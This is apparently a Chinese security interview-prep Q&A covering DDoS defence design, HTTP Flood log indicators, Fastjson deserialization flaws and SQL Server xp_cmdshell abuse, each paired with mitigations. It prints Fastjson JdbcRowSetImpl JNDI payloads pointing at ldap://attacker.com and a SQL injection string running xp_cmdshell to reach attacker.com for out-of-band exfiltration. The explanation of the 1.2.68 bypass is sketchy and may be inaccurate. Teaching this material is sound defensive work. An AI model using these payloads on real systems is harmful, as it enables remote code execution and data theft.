《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

上难度
问题1 :
设计抗DDoS方案时,如何在网络层、传输层、应用层分别部署防护?各列举2项关键技术。
答案:
-
网络层:BGP AnyCast分流、SYN Cookie防御
-
传输层:TCP速率限制、连接状态检测(如FIN包验证)
-
应用层:JavaScript Challenge、行为分析(如鼠标移动频率)
问题2 :
如何通过Nginx日志分析识别HTTP Flood攻击?给出至少3个关键指标及对应阈值设置逻辑。
答案:
-
请求频率:单IP > 1000次/分钟(基线动态调整)
-
User-Aent分布:异常集中(如90%请求使用相同UA)
-
URL熵值 :大量随机路径请求(如
/asdf1234
) -
响应码比例:高比例404/400(扫描特征)
问题3 :
分析Fastjson 1.2.24反序列化漏洞利用条件,给出利用JdbcRowSetImpl
的完整Payload及修复方案。
答案:
-
Payload:
{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://attacker.com/Exploit",
"autoCommit":true
} -
修复 :
-
升级至1.2.25+并启用
safeMode
-
配置
ParserConfig.getGlobalInstance().addDeny("com.sun.rowset")
-
问题4 :
Fastjson 1.2.68修补了AutoType绕过漏洞,请解释攻击者如何通过异常抛出机制绕过黑名单检测。
答案:
-
绕过原理 :
-
利用
java.lang.Exception
子类中的@type
字段触发反序列化 -
异常类加载时绕过
checkAutoType()
检查
-
-
Payload示例:
{
"@type":"java.lang.Exception",
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://attacker.com/exp",
"autoCommit":true
}
问题5 :
某系统允许通过SQL语句调用存储过程,如何利用xp_cmdshell
实现RCE?说明防御的多层方案。
答案:
-
攻击步骤 :
-
注入语句:
'; EXEC master..xp_cmdshell 'ping attacker.com'--
-
通过DNS或ICMP外带数据
-
-
防御方案 :
-
数据库层:禁用
xp_cmdshell
、最小权限运行 -
应用层:输入过滤(如禁用
EXEC
关键字) -
网络层:出站流量监控
-
问题 :
设计抗DDoS方案时,如何保障核心业务在500Gbps流量攻击下的可用性?需包含架构设计及应急响应流程。
答案:
-
架构设计 :
-
流量清洗中心:AnyCast+GRE隧道引流
-
多CDN动态调度(如Cloudflare+Akamai)
-
业务降级:静态页面回退、非核心服务限流
-
-
应急流程 :
-
实时监控触发阈值(如95%带宽占用)
-
自动切换至清洗中心
-
人工分析攻击特征更新防护规则
-